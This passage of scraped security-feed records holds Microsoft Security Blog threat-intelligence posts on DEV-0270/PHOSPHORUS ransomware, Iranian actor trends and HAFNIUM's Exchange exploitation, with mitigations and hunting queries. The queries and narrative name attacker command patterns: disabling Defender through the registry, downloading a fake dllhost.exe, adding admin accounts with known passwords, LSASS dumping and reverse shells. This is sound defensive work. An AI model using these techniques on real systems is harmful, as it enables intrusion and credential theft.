If the threat actor has exploited these vulnerabilities to install malware, installing the updates _does not_ remove implanted malware or evict the actor.\n * Use [Microsoft Defender Firewall](<https://support.microsoft.com/windows/turn-microsoft-defender-firewall-on-or-off-ec0844f7-aebd-0583-67fe-601ecf5d774f>), intrusion prevention devices, and your network firewall to prevent RPC and SMB communication among devices whenever possible. This limits lateral movement and other attack activities.\n * Check your perimeter firewall and proxy to restrict or prevent network appliances like Fortinet SSL VPN devices from making arbitrary connections to the internet to browse or download files.\n * Enforce strong local administrator passwords. Use tools like [LAPS](<https://docs.microsoft.com/previous-versions/mt227395\\(v=msdn.10\\)?redirectedfrom=MSDN>).\n * Ensure that [Microsoft Defender Antivirus](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows?view=o365-worldwide>) is up to date and that real-time behavior monitoring is enabled.\n * Keep backups so you can recover data affected by destructive attacks. Use controlled folder access to prevent unauthorized applications from modifying protected files.\n * Turn on the following [attack surface reduction rules](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>) to block or audit activity associated with this threat:\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n * Block process creations originating from PsExec and WMI commands\n * Block persistence through WMI event subscription. 
 * Ensure that Microsoft Defender for Endpoint is up to date and that real-time behavior monitoring is enabled.\n\n## Detection details\n\n### Microsoft Defender for Endpoint\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Malware associated with DEV-0270 activity group detected\n\nThe following additional alerts may also indicate activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\nAlert title| Alert title (continued) \n---|--- \nA script with suspicious content was observed| Suspicious file dropped by Exchange Server process \nA suspicious file was observed| Suspicious Modify Registry \nAnomalous behavior by a common executable| Suspicious Permission Groups Discovery \nLazagne post-exploitation tool| Suspicious PowerShell command line \nLocal Emails Collected| Suspicious PowerShell download or encoded command execution \nMimikatz credential theft tool| Suspicious Process Discovery \n'Mimilove' high-severity malware was prevented| Suspicious process executed PowerShell command \nNew group added suspiciously| Suspicious process launched using dllhost.exe \nOngoing hands-on-keyboard attack via Impacket toolkit| Suspicious 'PShellCobStager' behavior was blocked \nPossible Antimalware Scan Interface (AMSI) tampering| Suspicious Scheduled Task Process Launched \nPossible attempt to discover groups and permissions| Suspicious sequence of exploration activities \nPossible exploitation of Exchange Server vulnerabilities| Suspicious 'SuspExchgSession' behavior was blocked \nPossible exploitation of ProxyShell vulnerabilities| Suspicious System Network Configuration Discovery \nPossible web shell installation| Suspicious System Owner/User Discovery \nProcess memory dump| Suspicious Task Scheduler activity \nSuspicious Account Discovery: Email Account| Suspicious User Account Discovery \nSuspicious behavior by cmd.exe was observed| 
Suspicious user password change \nSuspicious behavior by svchost.exe was observed| Suspicious w3wp.exe activity in Exchange \n| System file masquerade \nSuspicious behavior by Web server process| Tampering with the Microsoft Defender for Endpoint sensor \nSuspicious Create Account| Unusual sequence of failed logons \nSuspicious file dropped| WDigest configuration change \n \n## Hunting queries\n\n### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the following queries to look for the related malicious activity in their environments.\n\n**DEV-0270 registry IOC**\n\nThis query identifies registry modifications by the DEV-0270 actor that disable security features or add ransom notes:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270RegistryIOCSep2022.yaml>\n\n**DEV-0270 malicious PowerShell usage**\n\nDEV-0270 heavily uses PowerShell to achieve their objectives at various stages of their attack. This query locates PowerShell activity tied to the actor:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270PowershellSep2022.yaml>\n\n**DEV-0270 WMIC discovery**\n\nThis query identifies _dllhost.exe_ using WMIC to discover additional hosts and associated domains in the environment:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270WMICDiscoverySep2022.yaml>\n\n**DEV-0270 new user creation**\n\nThis query detects the creation of a new user with a known DEV-0270 username/password schema:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270NewUserSep2022.yaml>\n\n### Microsoft 365 Defender\n\nTo locate possible actor activity, run the following queries.\n\n**Disable services via registry** \nSearch for processes modifying the registry to disable security features. 
[GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Disabling%20Services%20via%20Registry.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessCommandLine has_all(@'\"reg\"', 'add', @'\"HKLM\\SOFTWARE\\Policies\\', '/v', '/t', 'REG_DWORD', '/d', '/f')\n and InitiatingProcessCommandLine has_any('DisableRealtimeMonitoring', 'UseTPMKey', 'UseTPMKeyPIN', 'UseAdvancedStartup', 'EnableBDEWithNoTPM', 'RecoveryKeyMessageSource')\n\n**Modifying the registry to add a ransom message notification**\n\nIdentify registry modifications that are indicative of a ransom note tied to DEV-0270. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Modifying%20the%20registry%20to%20add%20a%20ransom%20message%20notification.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessCommandLine has_all('\"reg\"', 'add', @'\"HKLM\\SOFTWARE\\Policies\\', '/v', '/t', 'REG_DWORD', '/d', '/f', 'RecoveryKeyMessage', 'Your drives are Encrypted!', '@')\n\n**DLLHost.exe file creation via PowerShell**\n\nIdentify masqueraded _DLLHost.exe_ file created by PowerShell. 
[GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/DLLHost.exe%20file%20creation%20via%20PowerShell.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ 'powershell.exe'\n | where InitiatingProcessCommandLine has_all('$file=', 'dllhost.exe', 'Invoke-WebRequest', '-OutFile')\n\n**Add malicious user to Admins and RDP users group via PowerShell**\n\nLook for a user being added to the Administrators and Remote Desktop Users groups via PowerShell. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Add%20malicious%20user%20to%20Admins%20and%20RDP%20users%20group%20via%20PowerShell.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ 'powershell.exe'\n | where InitiatingProcessCommandLine has_all('$admins=', 'System.Security.Principal.SecurityIdentifier', 'Translate', '-split', 'localgroup', '/add', '$rdp=')\n\n**Email data exfiltration via PowerShell**\n\nIdentify email exfiltration conducted by PowerShell. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml>)\n \n \n DeviceProcessEvents\n | where FileName =~ 'powershell.exe'\n | where ProcessCommandLine has_all('Add-PSSnapin', 'Get-Recipient', '-ExpandProperty', 'EmailAddresses', 'SmtpAddress', '-hidetableheaders')\n\n**Create new user with known DEV-0270 username/password** \nSearch for the creation of a new user using a known DEV-0270 username/password schema. 
[GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Create%20new%20user%20with%20known%20DEV-0270%20username%20and%20password.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessCommandLine has_all('net user', '/add')\n | parse InitiatingProcessCommandLine with * \"user \" username \" \"*\n | extend password = extract(@\"\\buser\\s+[^\\s]+\\s+([^\\s]+)\", 1, InitiatingProcessCommandLine)\n | where username in('DefaultAccount') or password in('P@ssw0rd1234', '_AS_@1394')\n\n**PowerShell adding exclusion path for Microsoft Defender of ProgramData**\n\nIdentify PowerShell adding the ProgramData directory as a Microsoft Defender exclusion path so that it is no longer monitored. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/PowerShell%20adding%20exclusion%20path%20for%20Microsoft%20Defender%20of%20ProgramData.yaml>)\n \n \n DeviceProcessEvents\n | where FileName =~ \"powershell.exe\" and ProcessCommandLine has_all(\"try\", \"Add-MpPreference\", \"-ExclusionPath\", \"ProgramData\", \"catch\")\n \n\n**DLLHost.exe WMIC domain discovery**\n\nIdentify dllhost.exe using WMIC to discover additional hosts and the associated domain. 
[GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/DLLHost.exe%20WMIC%20domain%20discovery.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \"dllhost.exe\" and InitiatingProcessCommandLine == \"dllhost.exe\"\n | where ProcessCommandLine has \"wmic computersystem get domain\"\n \n\nThe post [Profiling DEV-0270: PHOSPHORUS\u2019 ransomware operations](<https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-07T21:00:00", "type": "mssecure", "title": "Profiling DEV-0270: PHOSPHORUS\u2019 ransomware operations", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-44228"], "modified": "2022-09-07T21:00:00", "id": "MSSECURE:1E3441B57C08BC18202B9FE758C2CA71", "href": 
"https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-19T19:09:58", "description": "Over the past year, the Microsoft Threat Intelligence Center (MSTIC) has observed a gradual evolution of the tools, techniques, and procedures employed by malicious network operators based in Iran. At [CyberWarCon 2021](<https://www.cyberwarcon.com/>), MSTIC analysts presented their analysis of these trends in Iranian nation state actor activity during a session titled \u201c_The Iranian evolution: Observed changes in Iranian malicious network operations_\u201d. This blog is intended to summarize the content of that research and the topics covered in their presentation and demonstrate MSTIC\u2019s ongoing efforts to track these actors and protect customers from the related threats.\n\nMSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections into our products that improve customer protections. We are sharing this blog today so that others in the community can also be aware of the latest techniques we have observed being used by Iranian actors.\n\nAs with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. 
Once it meets the criteria, a DEV is converted to a named actor.\n\nThree notable trends in Iranian nation-state operators have emerged:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\n## Ransomware\n\nSince September 2020, MSTIC has observed six Iranian threat groups deploying ransomware to achieve their strategic objectives. These ransomware deployments were launched in waves every six to eight weeks on average.\n\n\n\n_Figure 1: Timeline of ransomware attacks by Iranian threat actors_\n\nIn one observed campaign, PHOSPHORUS targeted the Fortinet FortiOS SSL VPN and unpatched on-premises Exchange Servers globally with the intent of deploying ransomware on vulnerable networks. A recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describes a similar intrusion in which actors leveraged vulnerabilities in on-premise Exchange Servers to compromise a victim environment and encrypt systems via BitLocker. MSTIC also attributes this activity to PHOSPHORUS. PHOSPHORUS operators conducted widespread scanning and ransomed targeted systems through a five-step process: Scan, Exploit, Review, Stage, Ransom.\n\n### Scan\n\nIn the early part of 2021, PHOSPHORUS actors scanned millions of IPs on the internet for Fortinet FortiOS SSL VPN that were vulnerable to [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>). This vulnerability allowed the attackers to collect clear-text credentials from the sessions file on vulnerable Fortinet VPN appliances. The actors collected credentials from over 900 Fortinet VPN servers in the United States, Europe, and Israel so far this year. 
In the last half of 2021, PHOSPHORUS shifted to scanning for unpatched on-premises Exchange Servers vulnerable to ProxyShell ([CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>)).\n\n### Exploit\n\nWhen they identified vulnerable servers, PHOSPHORUS sought to gain persistence on the target systems. In some instances, the actors downloaded a Plink runner named _MicrosoftOutLookUpdater.exe_. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.\n\n### Review\n\nAfter gaining persistence, PHOSPHORUS actors triaged hundreds of victims to determine which of them were fitting for actions on objectives. On select victims, operators created local administrator accounts with a username of \u201chelp\u201d and password of \u201c_AS_@1394\u201d via the commands below. On occasion, actors dumped LSASS to acquire credentials to be used later for lateral movement.\n\n\n\n### Stage and Ransom\n\nFinally, MSTIC observed PHOSPHORUS employing BitLocker to encrypt data and ransom victims at several targeted organizations. BitLocker is a full volume encryption feature meant to be used for legitimate purposes. After compromising the initial server (through vulnerable VPN or Exchange Server), the actors moved laterally to a different system on the victim network to gain access to higher value resources. From there, they deployed a script to encrypt the drives on multiple systems. 
Victims were instructed to reach out to a specific Telegram page to pay for the decryption key.\n\n\n\n## Patience and persistence\n\nMSTIC has observed PHOSPHORUS threat actors employing social engineering to build rapport with their victims before targeting them. These operations likely required significant investment in the operator\u2019s time and resources to refine and execute. This trend indicates PHOSPHORUS is either moving away from or expanding on their past tactics of sending unsolicited links and attachments in spear-phishing email campaigns to attempt credential theft.\n\n### PHOSPHORUS \u2013 Patient and persistent\n\nPHOSPHORUS sends \u201cinterview requests\u201d to target individuals through emails that contain tracking links to confirm whether the user has opened the file. Once a response is received from the target user, PHOSPHORUS attackers send a link to a benign list of interview questions hosted on a cloud service provider. The attackers continue with several back-and-forth conversations discussing the questions with the target user before finally sending a meeting invite with a link masquerading as a Google Meeting.\n\nOnce the meeting invite is sent, the attackers continuously reach out to the target user, asking them to test the Google Meeting link. The attackers contact the targeted user multiple times per day, continuously pestering them to click the link. The attackers even go so far as to offer to call the target user to walk them through clicking the link. 
The attackers are more than willing to troubleshoot any issues the user has signing into the fake Google Meeting link, which leads to a credential harvesting page.\n\nMSTIC has observed PHOSPHORUS operators become very aggressive in their emails after the initial lure is sent, to the point where they are almost demanding a response from the targeted user.\n\n### CURIUM \u2013 In it for the long run\n\nCURIUM is another Iranian threat actor group that has shown a great deal of patience when targeting users. Instead of phishing emails, CURIUM actors leverage a network of fictitious social media accounts to build trust with targets and deliver malware.\n\nThese attackers follow this playbook:\n\n * Masquerade as an attractive woman on social media\n * Establish a connection via social media with a target user via LinkedIn, Facebook, etc.\n * Chat with the target daily\n * Send benign videos of the woman to the target to prime them to lower their guard\n * Send malicious files to the target similar to the benign files previously sent\n * Request that the target user open the malicious document\n * Exfiltrate data from the victim machine\n\nThe process above can take multiple months from the initial connection to the delivery of the malicious document. The attackers build a relationship with target users over time by having constant and continuous communications which allows them to build trust and confidence with the target. In many of the cases we have observed, the targets genuinely believed that they were making a human connection and not interacting with a threat actor operating from Iran.\n\nBy exercising patience, building relationships, and pestering targets continuously once a relationship has been formed, Iranian threat actors have had more success in compromising their targets.\n\n## Brute force\n\nIn 2021, MSTIC observed DEV-0343 aggressively targeting Office 365 tenants via an ongoing campaign of password spray attacks. 
DEV-0343 is a threat actor MSTIC assesses to be likely operating in support of Iranian interests. MSTIC has [blogged about DEV-0343 activity previously](<https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/>).\n\nAnalysis of Office 365 logs suggests that DEV-0343 is using a red team tool like [o365spray](<https://github.com/0xZDH/o365spray>) to conduct these attacks.\n\nTargeting in this DEV-0343 activity has been observed across defense companies that support United States, European Union, and Israeli government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems. Further activity has targeted customers in geographic information systems (GIS), spatial analytics, regional ports of entry in the Persian Gulf, and several maritime and cargo transportation companies with a business focus in the Middle East.\n\nAs we discussed in our previous blog, DEV-0343 operators\u2019 \u2018pattern of life\u2019 is consistent with the working schedule of actors based in Iran. DEV-0343 operator activity peaked Sunday through Thursday between 04:00:00 and 16:00:00 UTC.\n\n\n\n_Figure 2: DEV-0343 observed operating hours in UTC_\n\n\n\n_Figure 3: DEV-0343 observed actor requests per day_\n\nKnown DEV-0343 operators have also been observed targeting the same account on the same tenant being targeted by other known Iranian operators. For example, EUROPIUM operators attempted to access a specific account on June 12, 2021 and ultimately gained access to this account on June 13, 2021. DEV-0343 was then observed targeting this same account within minutes of EUROPIUM operators gaining access to it the same day. 
MSTIC assesses that these observed overlapping activities suggest a coordination between different Iranian actors pursuing common objectives.\n\n## Closing thoughts: Increasingly capable threat actors\n\nAs Iranian operators have adapted both their strategic goals and tradecraft, over time they have evolved into more competent threat actors capable of conducting a full spectrum of operations including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, Iranian operators have proven themselves to be both willing and able to:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\nMSTIC thanks CyberWarCon 2021 for the opportunity to present this research to the broader security community. Microsoft will continue to monitor all this activity by Iranian actors and implement protections for our customers.\n\n \n\nThe post [Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-16T16:00:08", "type": "mssecure", "title": "Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation 
at CyberWarCon 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-11-16T16:00:08", "id": "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "href": "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-10T12:09:16", "description": "_**Update [03/08/2021]**: Microsoft continues to see multiple actors taking advantage of unpatched systems to attack organizations with on-premises Exchange Server. To aid defenders in investigating these attacks where Microsoft security products and tooling may not be deployed, we are releasing a feed of observed indicators of compromise (IOCs). The feed of malware hashes and known malicious file paths observed in related attacks is available in both JSON and CSV formats at the below GitHub links. 
This information is being shared as TLP:WHITE._\n\n * [CSV format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>)\n * [JSON format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>)\n\n_**Update [03/05/2021]**: Microsoft sees increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM. To aid customers in investigating these attacks, Microsoft Security Response Center (MSRC) has provided additional resources, including new mitigation guidance: [Microsoft Exchange Server Vulnerabilities Mitigations \u2013 March 2021](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>)_\n\n_**Update [03/04/2021]**: The Exchange Server team released a script for checking HAFNIUM indicators of compromise (IOCs). See Scan Exchange log files for indicators of compromise._\n\n \n\nMicrosoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. 
Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to [HAFNIUM](<https://blogs.microsoft.com/on-the-issues/?p=64505>), a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.

The vulnerabilities recently being exploited were CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in today’s [Microsoft Security Response Center (MSRC) release - Multiple Security Updates Released for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). We strongly urge customers to update on-premises systems immediately. Exchange Online is not affected.

We are sharing this information with our customers and the security community to emphasize the critical nature of these vulnerabilities and the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem. This blog also continues our mission to shine a light on malicious actors and elevate awareness of the sophisticated tactics and techniques used to target our customers. The related IOCs, [Azure Sentinel](<https://azure.microsoft.com/en-us/services/azure-sentinel/>) advanced hunting queries, and [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) product detections and queries shared in this blog will help SOCs proactively hunt for related activity in their environments and elevate any alerts for remediation.

Microsoft would like to thank our industry colleagues at Volexity and Dubex for reporting different parts of the attack chain and their collaboration in the investigation. Volexity has also [published a blog post](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities>) with their analysis. It is this level of proactive communication and intelligence sharing that allows the community to come together to get ahead of attacks before they spread and improve security for all.

## Who is HAFNIUM?

HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.

HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like [Covenant](<https://github.com/cobbr/Covenant>), for command and control. Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like [MEGA](<https://mega.nz/>).

In campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets’ environments.

HAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.

## Technical details

Microsoft is providing the following details to help our customers understand the techniques used by HAFNIUM to exploit these vulnerabilities and enable more effective defense against any future attacks against unpatched systems.

[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.

[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.

[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.

[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.

## Attack details

After exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. One example of a web shell deployed by HAFNIUM, written in ASP, is below:

Following web shell deployment, HAFNIUM operators performed the following post-exploitation activity:

 * Using Procdump to dump the LSASS process memory:
 * Using 7-Zip to compress stolen data into ZIP files for exfiltration:
 * Adding and using Exchange PowerShell snap-ins to export mailbox data:
 * Using the [Nishang](<https://github.com/samratashok/nishang>) Invoke-PowerShellTcpOneLine reverse shell:
 * Downloading PowerCat from GitHub, then using it to open a connection to a remote server:

HAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users.

Our blog, [Defending Exchange servers under attack](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>), offers advice for improving defenses against Exchange server compromise. Customers can also find additional guidance about web shell attacks in our blog [Web shell attacks continue to rise](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>).

## Can I determine if I have been compromised by this activity?

The below sections provide indicators of compromise (IOCs), detection guidance, and advanced hunting queries to help customers investigate this activity using Exchange server logs, Azure Sentinel, Microsoft Defender for Endpoint, and Microsoft 365 Defender. We encourage our customers to conduct investigations and implement proactive detections to identify possible prior campaigns and prevent future campaigns that may target their systems.

### Check patch levels of Exchange Server

The Microsoft Exchange Server team has published a [blog post on these new Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) providing a script to get a quick inventory of the patch-level status of on-premises Exchange servers and answer some basic questions around installation of these patches.

### Scan Exchange log files for indicators of compromise

The Exchange Server team has created a script to run a check for HAFNIUM IOCs to address performance and memory concerns. That script is available here: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.

 * CVE-2021-26855 exploitation can be detected via the following Exchange HttpProxy logs:
   * These logs are located in the following directory: %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\HttpProxy
   * Exploitation can be identified by searching for log entries where the AuthenticatedUser is empty and the AnchorMailbox contains the pattern of ServerInfo~*/*
   * Here is an example PowerShell command to find these log entries:

     `Import-Csv -Path (Get-ChildItem -Recurse -Path "$env:PROGRAMFILES\Microsoft\Exchange Server\V15\Logging\HttpProxy" -Filter '*.log').FullName | Where-Object { $_.AnchorMailbox -like 'ServerInfo~*/*' -or $_.BackEndCookie -like 'Server~*/*~*'} | select DateTime, AnchorMailbox, UrlStem, RoutingHint, ErrorCode, TargetServerVersion, BackEndCookie, GenericInfo, GenericErrors, UrlHost, Protocol, Method, RoutingType, AuthenticationType, ServerHostName, HttpStatus, BackEndStatus, UserAgent`

   * If activity is detected, the logs specific to the application specified in the AnchorMailbox path can be used to help determine what actions were taken.
   * These logs are located in the %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging directory.
 * CVE-2021-26858 exploitation can be detected via the Exchange log files:
   * C:\Program Files\Microsoft\Exchange Server\V15\Logging\OABGeneratorLog
   * Files should only be downloaded to the %PROGRAMFILES%\Microsoft\Exchange Server\V15\ClientAccess\OAB\Temp directory
   * In case of exploitation, files are downloaded to other directories (UNC or local paths)
   * Windows command to search for potential exploitation:

     `findstr /snip /c:"Download failed and temporary file" "%PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\OABGeneratorLog\*.log"`

 * CVE-2021-26857 exploitation can be detected via the Windows Application event logs:
   * Exploitation of this deserialization bug will create Application events with the following properties:
     * Source: MSExchange Unified Messaging
     * EntryType: Error
     * Event Message Contains: System.InvalidCastException
   * Following is a PowerShell command to query the Application Event Log for these log entries:

     `Get-EventLog -LogName Application -Source "MSExchange Unified Messaging" -EntryType Error | Where-Object { $_.Message -like "*System.InvalidCastException*" }`

 * CVE-2021-27065 exploitation can be detected via the following Exchange log files:
   * C:\Program Files\Microsoft\Exchange Server\V15\Logging\ECP\Server

     All Set-<AppName>VirtualDirectory properties should never contain script. InternalUrl and ExternalUrl should only be valid Uris.

